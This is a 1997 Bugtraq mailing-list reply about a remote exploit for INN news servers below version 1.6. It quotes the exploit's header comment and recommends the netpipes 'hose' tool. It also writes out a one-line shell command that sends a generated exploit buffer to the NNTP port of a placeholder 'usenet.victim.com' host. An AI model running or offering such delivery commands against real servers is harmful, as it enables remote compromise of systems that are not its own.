|
Bugtraq
mailing list archives
Re: INND causes cancer in laboratory rats (fwd)
From: thoth () PURPLEFROG COM (thoth () PURPLEFROG COM)
Date: Fri, 1 Aug 1997 16:26:40 -0400
Dan Fleisher <method () arena cwnet com> ,in message <Pine.LNX.3.96.970801113741.2
1315A-100000 () arena cwnet com>, wrote:
---------------------------- nnrp.c --------------------------------------
/*
* Remote exploit for INN version < 1.6. Requires 'innbuf' program to operate
.
* To compile: cc nnrp.c -o nnrp. Usage: nnrp <host> <file generated by innbu
f>.
* (C) 1997 by Method of Dweebs <method () arena cwnet com>
*/
Consider using the "hose" program from the Netpipes package.
http://www.purplefrog.com/~thoth/netpipes/
I suspect it can be a convenient wrapper for the network functionality of
the nnrp.c program you posted, allowing you to concentrate on just copying
data around.
``
The netpipes package makes TCP/IP streams usable in shell scripts. It can also
simplify client/server code by allowing the programmer to skip all the tedious
programming bits related to sockets and concentrate on writing a
filter/service.
faucet is the server end of a TCP/IP stream. It listens on a port of the local
machine waiting for connections. Every time it gets a connection it forks a
process to perform a service for the connecting client.
hose is the client end of a TCP/IP stream. It actively connects to a remote
port and execs a process to request a service.
''
It might even be as simple as
hose usenet.victim.com nntp -fd3 sh -c "cat <&3 & cat innbuf.out >&3; cat >&3 ; sockdown "
If you need to attach a descriptor to a network socket for a quick hack, use
faucet or hose.
--
Bob Forsman thoth () gainesville fl us
http://www.gainesville.fl.us/~thoth/
 By Date 
By Thread
Current thread:
INND causes cancer in laboratory rats (fwd) Dan Fleisher (Aug 01)
| 
Intro
